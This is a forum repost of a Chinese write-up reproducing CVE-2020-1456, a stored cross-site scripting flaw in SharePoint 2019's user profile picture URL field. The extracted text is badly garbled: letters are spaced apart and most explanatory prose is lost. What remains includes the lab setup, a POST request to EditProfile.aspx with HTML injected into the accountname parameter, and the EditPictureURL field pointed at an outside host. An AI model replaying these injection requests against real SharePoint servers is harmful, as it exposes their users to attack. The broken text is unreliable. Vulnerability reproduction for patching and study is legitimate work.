搜索

[16466] 2021-02-21_SharePoint2019XSS漏洞CVE-2020-1456复现

文档创建者:s7ckTeam
浏览次数:10
最后更新:2025-01-18
2021-02-21_SharePoint2019XSS漏洞CVE-2020-1456复现 S h a r e P o i n t   2 0 1 9   X S S C V E - 2 0 2 0 - 1 4 5 6 A l p h a _ h 4 c k   F r e e B u f   2 0 2 1 - 0 2 - 2 1 S h a r e P o i n t   2 0 1 9 J a v a S c r i p t   X S S X S S S h a r e P o i n t   2 0 1 9 访 S h a r e P o i n t D o S X S S C V E - 2 0 2 0 - 1 4 5 6 W i n d o w s   S e r v e r W i n d o w s   S e r v e r   2 0 1 9   E v a l u a t i o n :   1 8 0 9 O S   b u i l d :   1 7 7 6 3 . 3 7 9 W i n d o w s 0 9 / 0 9 / 2 0 1 9   1 2 : 1 3 P M S Q L   S e r v e r M S   S Q L   S e r v e r   2 0 1 7   E v a l u a t i o n   E d i t i o n :   :   1 4 . 1 8 0 5 . 4 0 . 7 2 . 1 :   1 4 . 0 . 1 0 0 0 . 1 6 9 M i c r o s o f t   S Q L   S e r v e r   M a n a g e m e n t   S t u d i o   R e l e a s e   1 8 . 2 S h a r e P o i n t   2 0 1 9 S h a r e P o i n t   S e r v e r   2 0 1 9   ( 1 6 . 0 . 1 0 3 3 7 . 1 2 1 0 9 )
使 P a s s m a r k   O S F M o u n t   ( v 3 . 0 . 1 0 0 5 . 0 ) I M G I S O S i n g l e - S e r v e r S h a r e P o i n t U s e r   P r o f i l e   S e r v i c e C V S S   2 6 . 5 C V S S   3 . 1 6 . 5 S h a r e P o i n t S h a r e P o i n t S h a r e P o i n t S h a r e P o i n t P O S T h t t p : / / 1 9 2 . 1 6 8 . 0 . 1 5 1 / _ l a y o u t s / 1 5 / E d i t P r o f i l e . a s p x ? U s e r S e t t i n g s P r o v i d e r = 2 3 4 b f 0 e d - 7 0 d b - 4 1 5 8 - a 3 3 2 - 4 d f d 6 8 3 b 4 1 4 8 & R e t u r n U r l = h t t p % 3 a % 2 f % 2 f 1 9 2 . 1 6 8 . 0 . 1 5 1 % 2 f P e r s o n . a s p x % 3 f a c c o u n t n a m e % 3 d % 3 C   s p a n % 2 0 s t y l e = % 2 2 b a c k g r o u n d - c o l o r : % 2 0 # f c b d 0 0 % 2 2 % 3 E p o i n t % 3 C / s p a n % 3 E % 2 5 5 C % 3 C s p a n % 2 0 s t y l e = % 2 2 b a c k g r o u n d - c o l o r : % 2 0 # f c b d 0 0 % 2 2 % 3 E s h a r e u s e r % 3 C / s p a n % 3 E & c h a n g e p h o t o = 1
U R L U R L c t l 0 0 $ P l a c e H o l d e r M a i n $ P r o f i l e E d i t o r E d i t P i c t u r e U R L
P O S T h t t p : / / 1 2 3 . i t s e c . d e / r a n d o m . p n g U R L U R L 1 G B H T M L - i m g s r c c t l 0 0 % 2 4 P l a c e H o l d e r M a i n % 2 4 P r o f i l e E d i t o r E d i t P i c t u r e U R L = h t t p % 3 A % 2 F   % 2 F 1 9 2 . 1 6 8 . 0 . 1 5 1 % 3 A 8 0 % 2 F U s e r % 2 5 2 0 P h o t o s % 2 F P r o f i l b i l d e r % 2 F p o i n t _ s h a r e u s e r _ M t h u m b . j p g c t l 0 0 $ P l a c e H o l d e r M a i n $ P r o f i l e E d i t o r E d i t P i c t u r e U R L =   h t t p : / / 1 9 2 . 1 6 8 . 0 . 1 5 1 : 8 0 / U s e r % 2 0 P h o t o s / P r o f i l b i l d e r / p o i n t _ s h a r e u s e r _ M t h u m b . j p g c t l 0 0 $ P l a c e H o l d e r M a i n $ P r o f i l e E d i t o r E d i t P i c t u r e U R L = h t t p : / / 1 2 3 . i t s e c . d e / r a n d o m . p n g
访 使 h t t p s : / / p o r t a l . m s r c . m i c r o s o f t . c o m / e n - U S / s e c u r i t y - g u i d a n c e / a d v i s o r y / C V E - 2 0 2 0 - 1 4 5 6 h t t p s : / / c v e . m i t r e . o r g / c g i - b i n / c v e n a m e . c g i ? n a m e = C V E - 2 0 2 0 - 1 4 5 6 h t t p s : / / i t - s e c . d e / g e r / A k t u e l l e s - T e r m i n e / i t . s e c - b l o g / i t . s e c - R e s e a r c h - T e a m - f i n d e t - u n b e k a n n t e - S c h w a c h s t e l l e - i n - M i c r o s o f t - O f f i c e - S h a r e P o i n t

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理